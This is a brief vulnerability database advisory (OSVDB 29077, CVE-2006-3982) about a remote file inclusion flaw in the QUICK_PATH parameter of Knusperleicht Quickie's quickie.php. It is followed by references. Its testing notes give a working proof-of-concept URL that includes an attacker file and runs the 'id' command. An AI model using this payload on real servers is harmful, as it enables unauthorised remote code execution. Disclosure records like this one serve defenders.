Knusperleicht Quickie quickie.php QUICK_PATH Variable Remote File Inclusion

2006-08-01T18:18:06
ID OSVDB:29077
Type osvdb
Reporter OSVDB
Modified 2006-08-01T18:18:06

Description

Manual Testing Notes

http://[target]/[path]/quickie.php?QUICK_PATH=evilcode.txt?&cmd=id

References:

Vendor URL: http://www.knusperleicht.at/ Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0007.html Keyword: Kurdish Security # 20 ISS X-Force ID: 28125 CVE-2006-3982 Bugtraq ID: 19271